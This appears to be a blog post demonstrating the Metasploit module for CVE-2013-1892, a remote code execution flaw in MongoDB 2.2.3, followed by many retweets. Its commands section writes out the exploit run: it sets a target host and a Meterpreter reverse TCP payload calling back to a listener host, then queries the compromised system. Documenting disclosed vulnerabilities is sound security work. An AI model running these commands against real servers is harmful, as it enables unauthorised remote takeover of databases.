Timeline :
Vulnerability discovered and reported to vendor by agix around 2013-03-01
Vulnerability publicly disclosed by agix the 2013-03-24
Metasploit PoC provided the 2013-03-27
PoC provided by :
Reference(s) :
CVE-2013-1892
OSVDB-91632
BID-58695
Affected version(s) :
MongoDB 2.2.3 and previous
Tested on Ubuntu 10.04 x86 with :
MongoDB 2.2.3
Description :
This module exploits a the nativeHelper feature from spiderMonkey which allows to control execution by calling it with specially crafted arguments. This module has been tested successfully on MongoDB 2.2.3 on Ubuntu 10.04 and Debian Squeeze.
Commands :
use exploit/linux/misc/mongod_native_helper set RHOST 192.168.178.53 set PAYLOAD linux/x86/meterpreter/reverse_tcp set LHOST 192.168.178.36 exploit sysinfo getuid
RT @eromang: CVE-2013-1892 MongoDB nativeHelper.apply Remote Code Execution Metasploit Demo http://t.co/2GU15nwf8U
In what way is that a “spidermonkey” feature? Looks like the “native_helper” function was implemented by mongodb.
RT @eromang: CVE-2013-1892 MongoDB nativeHelper.apply Remote Code Execution Metasploit Demo http://t.co/2GU15nwf8U
CVE-2013-1892 MongoDB Remote Code Execution Metasploit Demo – http://t.co/nypdbCZvn1
RT @unixfreaxjp: #CVE-2013-1892 MongoDB nativeHelper.apply RemoteCode Execution #msf #Demo by @eromang http://t.co/QicaUx5gvc Video: htt …
RT @unixfreaxjp: #CVE-2013-1892 MongoDB nativeHelper.apply RemoteCode Execution #msf #Demo by @eromang http://t.co/QicaUx5gvc Video: htt …
RT @unixfreaxjp: #CVE-2013-1892 MongoDB nativeHelper.apply RemoteCode Execution #msf #Demo by @eromang http://t.co/QicaUx5gvc Video: htt …
#CVE-2013-1892 MongoDB nativeHelper.apply RemoteCode Execution #msf #Demo by @eromang http://t.co/QicaUx5gvc Video: http://t.co/aQvUne5WFf
RT @MalwareMustDie: #CVE-2013-1892 MongoDB nativeHelper.apply RemoteCode Execution #msf #Demo by @eromang http://t.co/bCm7KjzTUJ
CVE-2013-1892 MongoDB nativeHelper.apply Remote Code Execution Metasploit Demo: http://t.co/gVyhpOI4PO @eromang #infosec
RT @usscastro: Let the party begin… RT @eromang: CVE-2013-1892 MongoDB nativeHelper.apply Remote Code Execution Metasploit Demo http:/ …
Let the party begin… RT @eromang: CVE-2013-1892 MongoDB nativeHelper.apply Remote Code Execution Metasploit Demo http://t.co/QwgPucOjYk
RT @eromang: CVE-2013-1892 MongoDB nativeHelper.apply Remote Code Execution Metasploit Demo http://t.co/2GU15nwf8U
CVE-2013-1892 MongoDB nativeHelper.apply Remote Code Execution Metasploit Demo http://t.co/h0PxsIf26l
CVE-2013-1892 MongoDB Remote Code Execution Metasploit Demo
B! http://t.co/wS0N6gpXYI
#twihateb
CVE-2013-1892 MongoDB nativeHelper.apply Remote Code Execution Metasploit Demo http://t.co/o5WjqKUsfx via @eromang CC: @hmbr
RT @eromang2013CVE-2013-1892 MongoDB nativeHelper.apply Remote Code Execution Metasploit Demo http://t.co/zIh5YFeCNU: CVE-2013-1892 M…
CVE-2013-1892 MongoDB nativeHelper.apply Remote Code Execution Metasploit Demo http://t.co/2GU15nwf8U